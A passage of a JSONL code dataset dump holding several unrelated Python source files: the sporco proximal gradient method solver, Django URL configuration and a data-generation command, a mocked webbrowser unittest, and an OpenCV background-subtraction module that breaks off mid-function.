context)\n\n\n","repo_name":"RealNicolasBourbaki/SRLpp-heroku","sub_path":"catalogue/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18068268779","text":"from __future__ import division, print_function\nfrom builtins import range\n\nimport copy\nimport numpy as np\n\nfrom sporco.cdict import ConstrainedDict\nfrom sporco.common import IterativeSolver, solve_status_str\nfrom sporco.fft import rfftn, irfftn\nfrom sporco.array import transpose_ntpl_list\nfrom sporco.util import Timer\n\nfrom .backtrack import BacktrackRobust\nfrom .momentum import MomentumNesterov\nfrom .stepsize import StepSizePolicyBB\n\n__author__ = \"\"\"Cristina Garcia-Cardona \"\"\"\n\n\n__all__ = ['PGM', 'PGMDFT']\n\n\n\nclass PGM(IterativeSolver):\n r\"\"\"Base class for Proximal Gradient Method (PGM) algorithms\n (see for example Ch. 10 of :cite:`beck-2017-first` and\n Sec. 4.2 and 4.3 of :cite:`parikh-2014-proximal`). Algorithms\n such as FISTA :cite:`beck-2009-fast` and a robust variant of\n FISTA :cite:`florea-2017-robust` are also supported.\n\n Solve optimisation problems of the form\n\n .. math::\n \\mathrm{argmin}_{\\mathbf{x}} \\; f(\\mathbf{x}) + g(\\mathbf{x}) \\;\\;,\n\n where :math:`f, g` are convex functions and :math:`f` is smooth.\n\n This class is intended to be a base class of other classes that\n specialise to specific optimisation problems.\n\n After termination of the :meth:`solve` method, attribute\n :attr:`itstat` is a list of tuples representing statistics of each\n iteration. The default fields of the named tuple\n ``IterationStats`` are:\n\n ``Iter`` : Iteration number\n\n ``ObjFun`` : Objective function value\n\n ``FVal`` : Value of smooth objective function component :math:`f`\n\n ``GVal`` : Value of objective function component :math:`g`\n\n ``F_Btrack`` : Value of objective function :math:`f + g`\n (see Sec. 2.2 of :cite:`beck-2009-fast`) when backtracking\n\n ``Q_Btrack`` : Value of Quadratic approximation :math:`Q_L`\n (see Sec. 
2.3 of :cite:`beck-2009-fast`) when backtracking\n\n ``IterBtrack`` : Number of iterations in backtracking\n\n ``Rsdl`` : Residual\n\n ``L`` : Inverse of gradient step parameter\n\n ``Time`` : Cumulative run time\n \"\"\"\n\n class Options(ConstrainedDict):\n r\"\"\"PGM algorithm options.\n\n Options:\n\n ``FastSolve`` : Flag determining whether non-essential\n computation is skipped. When ``FastSolve`` is ``True`` and\n ``Verbose`` is ``False``, the functional value and related\n iteration statistics are not computed. If ``FastSolve`` is\n ``True`` residuals are also not calculated, in which case the\n residual-based stopping method is also disabled, with the\n number of iterations determined only by ``MaxMainIter``.\n\n ``Verbose`` : Flag determining whether iteration status is\n displayed.\n\n ``StatusHeader`` : Flag determining whether status header and\n separator are displayed.\n\n ``DataType`` : Specify data type for solution variables,\n e.g. ``np.float32``.\n\n ``X0`` : Initial value for X variable.\n\n ``Callback`` : Callback function to be called at the end of\n every iteration.\n\n ``MaxMainIter`` : Maximum main iterations.\n\n ``IterTimer`` : Label of the timer to use for iteration times.\n\n ``RelStopTol`` : Relative convergence tolerance for fixed point\n residual (see Sec. 4.3 of :cite:`liu-2018-first`).\n\n ``L`` : Inverse of gradient step parameter :math:`L`.\n\n ``AutoStop`` : Options for adaptive stopping strategy (fixed\n point residual, see Sec. 4.3 of :cite:`liu-2018-first`).\n\n ``Enabled`` : Flag determining whether the adaptive stopping\n relative parameter strategy is enabled.\n\n ``Tau0`` : numerator in adaptive criterion\n (:math:`\\tau_0` in :cite:`liu-2018-first`).\n\n ``Monotone`` : Flag determining whether a monotone PGM version\n from :cite:`beck-2009-tv` is used. Default is False.\n\n ``Momentum`` : Momentum coefficient adaptation object. Standard\n options are Nesterov :cite:`beck-2009-fast`\n (:class:`.MomentumNesterov`), Linear\n :cite:`chambolle-2015-convergence`\n (:class:`.MomentumLinear`), and GenLinear\n :cite:`rodriguez-2019-convergence`\n (:class:`.MomentumGenLinear`), but a custom class derived\n from :class:`.MomentumBase` may also be specified. Default\n is :class:`.MomentumNesterov`.\n\n ``StepSizePolicy`` : non-iterative L adaptation object.\n Standard options are Cauchy :cite:`yuan-2008-stepsize`\n Sec. 3 (:class:`.StepSizePolicyCauchy`), and Barzilai-Borwein\n :cite:`barzilai-1988-stepsize`\n (:class:`.StepSizePolicyBB`), but a custom class derived\n from :class:`.StepSizePolicyBase` may also be specified.\n Default is None, no non-iterative L adaptation. Note that in\n case that both step size and Backtrack strategies are enabled\n only Backtrack will be used.\n\n ``Backtrack`` : PGM backtracking options. Options are Standard\n :cite:`beck-2009-fast` (:class:`.BacktrackStandard`) and\n Robust :cite:`florea-2017-robust` (:class:`.BacktrackRobust`),\n but a custom class derived from :class:`.BacktrackBase` may\n also be specified. Default is None, no backtracking. 
Note that\n in case that both step size and Backtrack strategies\n are enabled only Backtrack will be used.\n\n \"\"\"\n\n defaults = {'FastSolve': False, 'Verbose': False,\n 'StatusHeader': True, 'DataType': None,\n 'X0': None, 'Callback': None,\n 'MaxMainIter': 1000, 'IterTimer': 'solve',\n 'RelStopTol': 1e-3, 'L': None,\n 'AutoStop': {'Enabled': False, 'Tau0': 1e-2},\n 'Monotone': False,\n 'Momentum': MomentumNesterov(),\n 'StepSizePolicy': None,\n 'Backtrack': None}\n\n def __init__(self, opt=None):\n \"\"\"\n Parameters\n ----------\n opt : dict or None, optional (default None)\n PGM algorithm options\n \"\"\"\n\n if opt is None:\n opt = {}\n ConstrainedDict.__init__(self, opt)\n\n\n\n fwiter = 4\n \"\"\"Field width for iteration count display column\"\"\"\n fpothr = 2\n \"\"\"Field precision for other display columns\"\"\"\n\n itstat_fields_objfn = ('ObjFun', 'FVal', 'GVal')\n \"\"\"Fields in IterationStats associated with the objective function;\n see :meth:`eval_objfun`\"\"\"\n itstat_fields_alg = ('Rsdl', 'F_Btrack', 'Q_Btrack', 'IterBTrack', 'L')\n \"\"\"Fields in IterationStats associated with the specific solver\n algorithm\"\"\"\n itstat_fields_extra = ()\n \"\"\"Non-standard fields in IterationStats; see :meth:`itstat_extra`\"\"\"\n\n hdrtxt_objfn = ('Fnc', 'f', 'g')\n \"\"\"Display column headers associated with the objective function;\n see :meth:`eval_objfun`\"\"\"\n hdrval_objfun = {'Fnc': 'ObjFun', 'f': 'FVal', 'g': 'GVal'}\n \"\"\"Dictionary mapping display column headers in :attr:`hdrtxt_objfn`\n to IterationStats entries\"\"\"\n\n\n\n def __new__(cls, *args, **kwargs):\n \"\"\"Create a PGM object and start its initialisation timer.\"\"\"\n\n instance = super(PGM, cls).__new__(cls)\n instance.timer = Timer(['init', 'solve', 'solve_wo_func',\n 'solve_wo_rsdl', 'solve_wo_btrack'])\n instance.timer.start('init')\n return instance\n\n\n\n def __init__(self, xshape, dtype, opt=None):\n r\"\"\"\n Parameters\n ----------\n xshape : tuple of ints\n Shape of working variable X\n dtype : data-type\n Data type for working variables (overridden by 'DataType' option)\n opt : :class:`PGM.Options` object\n Algorithm options\n \"\"\"\n\n if opt is None:\n opt = PGM.Options()\n if not isinstance(opt, PGM.Options):\n raise TypeError(\"Parameter opt must be an instance of \"\n \"PGM.Options\")\n\n self.opt = opt\n\n # DataType option overrides data type inferred from __init__\n # parameters of derived class\n self.set_dtype(opt, dtype)\n\n # Initialise attributes representing step parameter and other\n # parameters\n self.set_attr('L', opt['L'], dval=1.0, dtype=self.dtype)\n\n # Configure policy for step size\n # Step size policy is turned off if Backtrack is enabled\n self.stepsizepolicy = self.opt['StepSizePolicy']\n if self.opt['Backtrack'] is not None:\n self.stepsizepolicy = None\n\n # Configure Momentum coefficients\n self.momentum = self.opt['Momentum']\n\n # If using adaptative stop criterion, set tau0 parameter\n if self.opt['AutoStop', 'Enabled']:\n self.tau0 = self.opt['AutoStop', 'Tau0']\n\n # Initialise working variable X\n if self.opt['X0'] is None:\n self.X = self.xinit(xshape)\n else:\n self.X = self.opt['X0'].astype(self.dtype, copy=True)\n\n # Default values for variables created only if Backtrack is enabled\n self.F = None\n self.Q = None\n self.iterBTrack = None\n self.backtrack = self.opt['Backtrack']\n\n self.Y = None\n\n self.itstat = []\n self.k = 0\n self.t = 1\n\n\n\n def xinit(self, xshape):\n \"\"\"Return initialiser for working variable X.\"\"\"\n\n return 
np.zeros(xshape, dtype=self.dtype)\n\n\n\n def solve(self):\n \"\"\"Start (or re-start) optimisation. This method implements the\n framework for the iterations of a PGM algorithm. There is\n sufficient flexibility in overriding the component methods that\n it calls that it is usually not necessary to override this method\n in derived clases.\n\n If option ``Verbose`` is ``True``, the progress of the\n optimisation is displayed at every iteration. At termination\n of this method, attribute :attr:`itstat` is a list of tuples\n representing statistics of each iteration, unless option\n ``FastSolve`` is ``True`` and option ``Verbose`` is ``False``.\n\n Attribute :attr:`timer` is an instance of :class:`.util.Timer`\n that provides the following labelled timers:\n\n ``init``: Time taken for object initialisation by\n :meth:`__init__`\n\n ``solve``: Total time taken by call(s) to :meth:`solve`\n\n ``solve_wo_func``: Total time taken by call(s) to\n :meth:`solve`, excluding time taken to compute functional\n value and related iteration statistics\n\n ``solve_wo_rsdl`` : Total time taken by call(s) to\n :meth:`solve`, excluding time taken to compute functional\n value and related iteration statistics as well as time take\n to compute residuals\n\n ``solve_wo_btrack`` : Total time taken by call(s) to\n :meth:`solve`, excluding time taken to compute functional\n value and related iteration statistics as well as time take\n to compute residuals and implemented ``Backtrack`` mechanism\n \"\"\"\n\n # Open status display\n fmtstr, nsep = self.display_start()\n\n # Start solve timer\n self.timer.start(['solve', 'solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n\n # Main optimisation iterations\n for self.k in range(self.k, self.k + self.opt['MaxMainIter']):\n\n # Update record of X and Y from previous iteration\n self.on_iteration_start()\n\n # Compute backtracking\n if self.opt['Backtrack'] is not None and self.k >= 0:\n self.timer.stop('solve_wo_btrack')\n # Compute backtracking\n self.backtrack.update(self)\n self.timer.start('solve_wo_btrack')\n else:\n # Compute just proximal step\n self.xstep()\n # Update by combining previous iterates\n self.ystep()\n\n # Compute residuals and stopping thresholds\n self.timer.stop(['solve_wo_rsdl', 'solve_wo_btrack'])\n if not self.opt['FastSolve']:\n frcxd, adapt_tol = self.compute_residuals()\n self.timer.start('solve_wo_rsdl')\n\n # Compute and record other iteration statistics and\n # display iteration stats if Verbose option enabled\n self.timer.stop(['solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n if not self.opt['FastSolve']:\n itst = self.iteration_stats(self.k, frcxd)\n self.itstat.append(itst)\n self.display_status(fmtstr, itst)\n self.timer.start(['solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n\n # Call callback function if defined\n if self.opt['Callback'] is not None:\n if self.opt['Callback'](self):\n break\n\n # Stop if residual-based stopping tolerances reached\n if not self.opt['FastSolve']:\n if frcxd < adapt_tol:\n break\n\n # Increment iteration count\n self.k += 1\n\n # Record solve time\n self.timer.stop(['solve', 'solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n\n # Print final separator string if Verbose option enabled\n self.display_end(nsep)\n\n return self.getmin()\n\n\n\n def getmin(self):\n \"\"\"Get minimiser after optimisation.\"\"\"\n\n return self.X\n\n\n\n def xstep(self, grad=None):\n \"\"\"Compute proximal update (gradient descent + regularization).\n Optionally, a monotone PGM version from 
:cite:`beck-2009-tv`\n is available.\n \"\"\"\n\n if grad is None:\n grad = self.grad_f()\n\n if self.stepsizepolicy is not None:\n if self.k > 1:\n self.L = self.stepsizepolicy.update(self, grad)\n if isinstance(self.stepsizepolicy, StepSizePolicyBB):\n # BB variants are two-point methods\n self.stepsizepolicy.store_prev_state(self.X, grad)\n\n V = self.Y - (1. / self.L) * grad\n\n self.X = self.prox_g(V)\n\n if self.opt['Monotone'] and self.k > 0:\n self.ZZ = self.X.copy()\n self.objfn = self.eval_objfn()\n if self.objfn_prev[0] < self.objfn[0]:\n # If increment on objective function\n # revert to previous iterate\n self.X = self.Xprv.copy()\n self.objfn = self.objfn_prev\n\n return grad\n\n\n\n def ystep(self):\n \"\"\"Build next update by a smart combination of previous updates\n (standard PGM :cite:`beck-2009-fast`). Optionally, a monotone\n PGM version from :cite:`beck-2009-tv` is available.\n \"\"\"\n\n # Update t step\n tprv = self.t\n self.t = self.momentum.update(self.var_momentum())\n\n # Update Y\n if self.opt['Monotone'] and self.k > 0:\n self.Y = self.X + (tprv / self.t) * (self.ZZ - self.X) \\\n + ((tprv - 1.) / self.t) * (self.X - self.Xprv)\n else:\n self.Y = self.X + ((tprv - 1.) / self.t) * (self.X - self.Xprv)\n\n\n\n def eval_linear_approx(self, Dxy, gradY):\n r\"\"\"Compute term :math:`\\langle \\nabla f(\\mathbf{y}), \\mathbf{x}\n - \\mathbf{y} \\rangle` that is part of the quadratic function\n :math:`Q_L` used for backtracking.\n \"\"\"\n\n return np.sum(Dxy * gradY)\n\n\n\n def grad_f(self, V):\n \"\"\"Compute gradient of :math:`f` at V.\n\n Overriding this method is required.\n \"\"\"\n\n raise NotImplementedError()\n\n\n\n def prox_g(self, V):\n \"\"\"Compute proximal operator of :math:`g`.\n\n Overriding this method is required.\n \"\"\"\n\n raise NotImplementedError()\n\n\n\n def hessian_f(self, V):\n \"\"\"Compute Hessian of :math:`f` and apply to V.\n\n Overriding this method is required.\n \"\"\"\n\n raise NotImplementedError()\n\n\n\n def on_iteration_start(self):\n \"\"\"Store previous X and Y states.\"\"\"\n\n self.Xprv = self.X.copy()\n if (not self.opt['FastSolve'] or isinstance(self.backtrack,\n BacktrackRobust)):\n self.Yprv = self.Y.copy()\n\n if self.opt['Monotone']:\n if self.k == 0:\n self.objfn = self.eval_objfn()\n self.objfn_prev = self.objfn\n\n\n def eval_Dxy(self):\n \"\"\"Evaluate difference of state and auxiliary state updates.\"\"\"\n\n return self.X - self.Y\n\n\n\n def compute_residuals(self):\n \"\"\"Compute residuals and stopping thresholds.\"\"\"\n\n r = self.rsdl()\n adapt_tol = self.opt['RelStopTol']\n\n if self.opt['AutoStop', 'Enabled']:\n adapt_tol = self.tau0 / (1. 
+ self.k)\n\n return r, adapt_tol\n\n\n\n @classmethod\n def hdrtxt(cls):\n \"\"\"Construct tuple of status display column title.\"\"\"\n\n return ('Itn',) + cls.hdrtxt_objfn + ('Rsdl', 'F', 'Q', 'It_Bt', 'L')\n\n\n\n @classmethod\n def hdrval(cls):\n \"\"\"Construct dictionary mapping display column title to\n IterationStats entries.\n \"\"\"\n\n hdr = {'Itn': 'Iter'}\n hdr.update(cls.hdrval_objfun)\n hdr.update({'Rsdl': 'Rsdl', 'F': 'F_Btrack', 'Q': 'Q_Btrack',\n 'It_Bt': 'IterBTrack', 'L': 'L'})\n\n return hdr\n\n\n\n def iteration_stats(self, k, frcxd):\n \"\"\"Construct iteration stats record tuple.\"\"\"\n\n tk = self.timer.elapsed(self.opt['IterTimer'])\n if self.opt['Monotone']:\n tpl = (k,) + self.objfn \\\n + (frcxd, self.F, self.Q, self.iterBTrack, self.L) \\\n + self.itstat_extra() + (tk,)\n else:\n tpl = (k,) + self.eval_objfn() \\\n + (frcxd, self.F, self.Q, self.iterBTrack, self.L) \\\n + self.itstat_extra() + (tk,)\n return type(self).IterationStats(*tpl)\n\n\n\n def eval_objfn(self):\n \"\"\"Compute components of objective function as well as total\n contribution to objective function.\n \"\"\"\n\n fval = self.obfn_f(self.X)\n gval = self.obfn_g(self.X)\n obj = fval + gval\n return (obj, fval, gval)\n\n\n\n def itstat_extra(self):\n \"\"\"Non-standard entries for the iteration stats record tuple.\"\"\"\n\n return ()\n\n\n\n def getitstat(self):\n \"\"\"Get iteration stats as named tuple of arrays instead of\n array of named tuples.\n \"\"\"\n\n return transpose_ntpl_list(self.itstat)\n\n\n\n def display_start(self):\n \"\"\"Set up status display if option selected. NB: this method\n assumes that the first entry is the iteration count and the\n last is the L value.\n \"\"\"\n\n if self.opt['Verbose']:\n # If backtracking option enabled F, Q, itBT, L are\n # included in iteration status\n if self.opt['Backtrack'] is not None:\n hdrtxt = type(self).hdrtxt()\n else:\n hdrtxt = type(self).hdrtxt()[0:-4]\n # Call utility function to construct status display formatting\n hdrstr, fmtstr, nsep = solve_status_str(\n hdrtxt, fmtmap={'It_Bt': '%5d'}, fwdth0=type(self).fwiter,\n fprec=type(self).fpothr)\n # Print header and separator strings\n if self.opt['StatusHeader']:\n print(hdrstr)\n print(\"-\" * nsep)\n else:\n fmtstr, nsep = '', 0\n\n return fmtstr, nsep\n\n\n\n def display_status(self, fmtstr, itst):\n \"\"\"Display current iteration status as selection of fields from\n iteration stats tuple.\n \"\"\"\n\n if self.opt['Verbose']:\n hdrtxt = type(self).hdrtxt()\n hdrval = type(self).hdrval()\n itdsp = tuple([getattr(itst, hdrval[col]) for col in hdrtxt])\n if self.opt['Backtrack'] is None:\n itdsp = itdsp[0:-4]\n\n print(fmtstr % itdsp)\n\n\n\n def display_end(self, nsep):\n \"\"\"Terminate status display if option selected.\"\"\"\n\n if self.opt['Verbose'] and self.opt['StatusHeader']:\n print(\"-\" * nsep)\n\n\n\n def var_x(self):\n r\"\"\"Get :math:`\\mathbf{x}` variable.\"\"\"\n\n return self.X\n\n\n\n def var_y(self, y=None):\n r\"\"\"Get, or update and get, :math:`\\mathbf{y}` variable.\"\"\"\n\n if y is not None:\n self.Y = y\n\n return self.Y\n\n\n\n def var_xprv(self):\n r\"\"\"Get :math:`\\mathbf{x}` variable of previous iteration.\"\"\"\n\n return self.Xprv\n\n\n\n def var_momentum(self):\n \"\"\"Most momentum coefficient methods require iteration but Nesterov\n requires current t.\"\"\"\n\n if isinstance(self.momentum, MomentumNesterov):\n return self.t\n return self.k\n\n\n\n def obfn_f(self, X):\n r\"\"\"Compute :math:`f(\\mathbf{x})` component of PGM objective\n 
function.\n\n Overriding this method is required (even if :meth:`eval_objfun`\n is overriden, since this method is required for backtracking).\n \"\"\"\n\n raise NotImplementedError()\n\n\n\n def obfn_g(self, X):\n r\"\"\"Compute :math:`g(\\mathbf{x})` component of PGM objective\n function.\n\n Overriding this method is required if :meth:`eval_objfun`\n is not overridden.\n \"\"\"\n\n raise NotImplementedError()\n\n\n\n def rsdl(self):\n \"\"\"Compute fixed point residual (see Sec. 4.3 of\n :cite:`liu-2018-first`).\"\"\"\n\n if self.opt['Monotone'] and self.k > 0:\n return np.linalg.norm((self.X - self.Y).ravel())\n return np.linalg.norm((self.X - self.Yprv).ravel())\n\n\n\n\n\nclass PGMDFT(PGM):\n r\"\"\"\n Base class for PGM algorithms with gradients and updates computed\n in the frequency domain.\n\n |\n\n .. inheritance-diagram:: PGMDFT\n :parts: 2\n\n |\n\n Solve optimisation problems of the form\n\n .. math::\n \\mathrm{argmin}_{\\mathbf{x}} \\; f(\\mathbf{x}) + g(\\mathbf{x})\n \\;\\;,\n\n where :math:`f, g` are convex functions and :math:`f` is smooth.\n\n This class specialises class PGM, but remains a base class for\n other classes that specialise to specific optimisation problems.\n \"\"\"\n\n\n class Options(PGM.Options):\n \"\"\"PGMDFT algorithm options.\n\n Options include all of those defined in :class:`PGM.Options`.\n \"\"\"\n\n defaults = copy.deepcopy(PGM.Options.defaults)\n\n def __init__(self, opt=None):\n \"\"\"\n Parameters\n ----------\n opt : dict or None, optional (default None)\n PGMDFT algorithm options\n \"\"\"\n\n if opt is None:\n opt = {}\n PGM.Options.__init__(self, opt)\n\n\n\n def __init__(self, xshape, Nv, axisN, dtype, opt=None):\n \"\"\"\n Parameters\n ----------\n xshape : tuple of ints\n Shape of working variable X (the primary variable)\n Nv : tuple of ints\n Shape of spatial indices of variable X (needed for DFT)\n axisN : tuple of ints\n Axis indices of spatial components of X (needed for DFT)\n dtype : data-type\n Data type for working variables\n opt : :class:`PGMDFT.Options` object\n Algorithm options\n \"\"\"\n\n if opt is None:\n opt = PGMDFT.Options()\n super(PGMDFT, self).__init__(xshape, dtype, opt)\n self.Nv = Nv\n self.axisN = axisN\n\n\n\n def xstep(self, gradf=None):\n \"\"\"Compute proximal update (gradient descent + constraint).\n Variables are mapped back and forth between input and\n frequency domains. Optionally, a monotone PGM version from\n :cite:`beck-2009-tv` is available.\n \"\"\"\n\n if gradf is None:\n gradf = self.grad_f()\n\n if self.stepsizepolicy is not None:\n if self.k > 1:\n self.L = self.stepsizepolicy.update(self, gradf)\n if isinstance(self.stepsizepolicy, StepSizePolicyBB):\n # BB variants are two-point methods\n self.stepsizepolicy.store_prev_state(self.Xf, gradf)\n\n self.Vf[:] = self.Yf - (1. / self.L) * gradf\n V = irfftn(self.Vf, self.Nv, self.axisN)\n\n self.X[:] = self.prox_g(V)\n self.Xf = rfftn(self.X, None, self.axisN)\n\n if self.opt['Monotone'] and self.k > 0:\n self.ZZf = self.Xf.copy()\n self.objfn = self.eval_objfn()\n if self.objfn_prev[0] < self.objfn[0]:\n # If increment on objective function\n # revert to previous iterate\n self.Xf = self.Xfprv.copy()\n self.objfn = self.objfn_prev\n\n return gradf\n\n\n\n def ystep(self):\n \"\"\"Update auxiliary state by a smart combination of previous\n updates in the frequency domain (standard PGM\n :cite:`beck-2009-fast`). 
Optionally, a monotone PGM version\n from :cite:`beck-2009-tv` is available.\n \"\"\"\n\n # Update t step\n tprv = self.t\n self.t = self.momentum.update(self.var_momentum())\n\n # Update Y\n if self.opt['Monotone'] and self.k > 0:\n self.Yf = self.Xf + (tprv / self.t) * (self.ZZf - self.Xf) \\\n + ((tprv - 1.) / self.t) * (self.Xf - self.Xfprv)\n else:\n self.Yf = self.Xf + ((tprv - 1.) / self.t) * (self.Xf - self.Xfprv)\n\n\n\n def on_iteration_start(self):\n \"\"\"Store previous X and Y in frequency domain.\"\"\"\n\n self.Xfprv = self.Xf.copy()\n if (not self.opt['FastSolve'] or isinstance(self.backtrack,\n BacktrackRobust)):\n self.Yfprv = self.Yf.copy()\n\n if self.opt['Monotone']:\n if self.k == 0:\n self.objfn = self.eval_objfn()\n self.objfn_prev = self.objfn\n\n\n\n def eval_Dxy(self):\n \"\"\"Evaluate difference of state and auxiliary state in\n frequency domain.\n \"\"\"\n\n return self.Xf - self.Yf\n\n\n\n def var_x(self):\n r\"\"\"Get :math:`\\mathbf{x}` variable in frequency domain.\"\"\"\n\n return self.Xf\n\n\n\n def var_y(self, y=None):\n r\"\"\"Get, or update and get, :math:`\\mathbf{y}` variable in\n frequency domain.\"\"\"\n\n if y is not None:\n self.Yf = y\n\n return self.Yf\n\n\n\n def var_xprv(self):\n r\"\"\"Get :math:`\\mathbf{x}` variable of previous iteration in\n frequency domain.\n \"\"\"\n\n return self.Xfprv\n\n\n\n def eval_linear_approx(self, Dxy, gradY):\n r\"\"\"Compute term :math:`\\langle \\nabla f(\\mathbf{y}),\n \\mathbf{x} - \\mathbf{y} \\rangle` (in frequency domain) that is\n part of the quadratic function :math:`Q_L` used for\n backtracking. Since this class computes the backtracking in\n the DFT, it is important to preserve the DFT scaling.\n \"\"\"\n\n return np.sum(np.real(np.conj(Dxy) * gradY))\n","repo_name":"bwohlberg/sporco","sub_path":"sporco/pgm/pgm.py","file_name":"pgm.py","file_ext":"py","file_size_in_byte":27148,"program_lang":"python","lang":"en","doc_type":"code","stars":238,"dataset":"github-code","pt":"54"} +{"seq_id":"416814142","text":"\"\"\"technotesplus URL Configuration\n\nThe `urlpatterns` list routes URLs to views. 
For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\n\"\"\"\n\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.urls.conf import include\n\n\nurlpatterns = [\n path(\"\", include(\"technotesplus.apps.core.urls\")),\n path(\"account/\", include(\"technotesplus.apps.account.urls\")),\n path(\"admin/\", admin.site.urls),\n path(\"notes/\", include(\"technotesplus.apps.note.urls\")),\n # jwt\n path(\"api/v1/token/\", TokenObtainPairView.as_view(), name=\"token_obtain_pair\"),\n path(\"api/v1/token/refresh/\", TokenRefreshView.as_view(), name=\"token_refresh\"),\n # api endpoints\n path(\"api/v1/account/\", include(\"technotesplus.apps.account.api.urls\")),\n path(\"api/v1/n/\", include(\"technotesplus.apps.note.api.urls\")),\n]\n","repo_name":"adnan-alam/technotesplus","sub_path":"technotesplus/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2861182232","text":"import webbrowser\nimport unittest\nimport unittest.mock\nfrom unittest.mock import patch\nimport webbrowser\n\nclass TestReview(unittest.TestCase):\n @patch('webbrowser.open')\n def test_normal_input(self, mock):\n\n result = {\n \"title\": \"Way of kings\",\n \"Author\": \"Brandon Sanderson\",\n }\n\n webbrowser.open('https://www.goodreads.com/search?utf8=%E2%9C%93&q=' + result[\"title\"] +'&search_type=books')\n\n self.assertTrue(mock.called)\n\n @patch('webbrowser.open')\n def test_messy_input(self, mock):\n\n result = {\n \"title\": \"asdawdawd\",\n \"Author\": \"asfdafw\",\n }\n\n webbrowser.open('https://www.goodreads.com/search?utf8=%E2%9C%93&q=' + result[\"title\"] +'&search_type=books')\n\n self.assertTrue(mock.called)\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Sabesan2000/SOFE-QUAILTY-FINAL","sub_path":"Testing/test_review.py","file_name":"test_review.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"27821151477","text":"import random\nfrom datetime import timedelta\nfrom random import randint\n\nfrom django.core.management.base import BaseCommand\nfrom django.utils.timezone import now\n\nfrom web.models import User, Pet, Post\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n current_date = now()\n user = User.objects.first()\n pets = Pet.objects.filter(user=user)\n\n posts = []\n\n for day_index in range(30):\n current_date -= timedelta(days=1)\n\n for post_index in range(randint(5, 10)):\n start_date = current_date + timedelta(days=randint(1, 10))\n end_date = start_date + timedelta(days=randint(1, 30))\n\n posts.append(Post(\n title=f'generated {day_index}-{post_index}',\n post_date=current_date,\n start_date=start_date,\n end_date=end_date,\n content=f'generated content {day_index}-{post_index}',\n opened=random.choice((True, False)),\n price=randint(100, 3000),\n user=user\n ))\n\n saved_posts = Post.objects.bulk_create(posts)\n post_pets = []\n for post in saved_posts:\n count_of_pets = randint(1, len(pets))\n for pet_index in range(count_of_pets):\n post_pets.append(\n Post.pets.through(post_id=post.id, pet_id=pets[pet_index].id)\n )\n 
Post.pets.through.objects.bulk_create(post_pets)\n","repo_name":"PolinaZi/pet_sitting_django","sub_path":"web/management/commands/generate_data.py","file_name":"generate_data.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27951794083","text":"import os\n\nimport cv2 as cv\nimport numpy as np\n\nfrom cv.utils.fileHandler import createOutFolder\n\n\ndef opencvBGSubMOG2(video: cv.VideoCapture, videoId: int, fps: int = 30, genNewCache: bool = False,\n **kwargs) -> cv.VideoCapture:\n cached_video, cacheName, cachePath = loadCache(\"MOG2\", videoId, genNewCache, kwargs)\n if cached_video is not None:\n return cached_video\n\n backsub = cv.createBackgroundSubtractorMOG2(\n kwargs.get('history', None),\n kwargs.get('varThreshold', 16),\n kwargs.get('detectShadows', False)\n )\n\n masks = []\n video.set(cv.CAP_PROP_POS_FRAMES, 0)\n kernel = cv.getStructuringElement(cv.MORPH_ELLIPSE, (kwargs.get(\"kernelSize\", 5), kwargs.get(\"kernelSize\", 5)))\n while video.isOpened():\n ret, frame = video.read()\n if not ret:\n break\n\n fgMask = backsub.apply(frame, learningRate=kwargs.get('learningRate', -1))\n\n fgMask = cv.morphologyEx(fgMask, cv.MORPH_OPEN, kernel)\n\n # Prepare the image for matching\n if kwargs.get('prepareMatching', False):\n prepareMatching(fgMask)\n\n # remove shadows (all gray to black)\n fgMask[fgMask == 127] = 255\n\n masks.append(cv.cvtColor(fgMask, cv.COLOR_GRAY2BGR))\n\n if kwargs.get('display', False) and not showVideoFrameWithMask(frame, fgMask, fps):\n break\n\n # saves video file\n createCache(cacheName, cachePath, masks, videoId)\n\n # load video to return\n video = cv.VideoCapture(cachePath)\n return video\n\n\ndef createCache(cacheName, cachePath, data, videoId):\n createOutFolder('cache')\n createOutFolder(f'cache/{videoId}')\n if os.path.isfile(cachePath):\n print(\"Overwriting Cache with name: \" + cacheName, end=\"\")\n os.remove(cachePath)\n else:\n print(\"Creating Cache with name: \" + cacheName, end=\"\")\n # Create video\n writer = cv.VideoWriter(cachePath, cv.VideoWriter_fourcc(*'FFV1'), 30, (data[0].shape[1], data[0].shape[0]))\n ten_th = len(data) // 10\n for i, mask in enumerate(data):\n writer.write(mask)\n if i % ten_th == 0:\n print(\"-\", end=\"\")\n writer.release()\n if not os.path.isfile(cachePath):\n raise Exception(\"Cache file could not be created at Path: \" + cachePath)\n print(\"> Done\")\n\n\n# returns video\ndef opencvBGSubKNN(video: cv.VideoCapture, videoId: int, fps: int = 30, genNewCache: bool = False,\n **kwargs) -> cv.VideoCapture:\n cached_video, cacheName, cachePath = loadCache(\"KNN\", videoId, genNewCache, kwargs)\n if cached_video is not None:\n return cached_video\n\n backsub = cv.createBackgroundSubtractorKNN(\n kwargs.get('history', None),\n kwargs.get('dist2Threshold', 400),\n kwargs.get('detectShadows', False)\n )\n\n masks = []\n video.set(cv.CAP_PROP_POS_FRAMES, 0)\n kernel_open = cv.getStructuringElement(cv.MORPH_ELLIPSE,\n (kwargs.get(\"kernelSize_open\", 5), kwargs.get(\"kernelSize_open\", 5)))\n kernel_close = cv.getStructuringElement(cv.MORPH_ELLIPSE,\n (kwargs.get(\"kernelSize_close\", 5), kwargs.get(\"kernelSize_close\", 5)))\n while 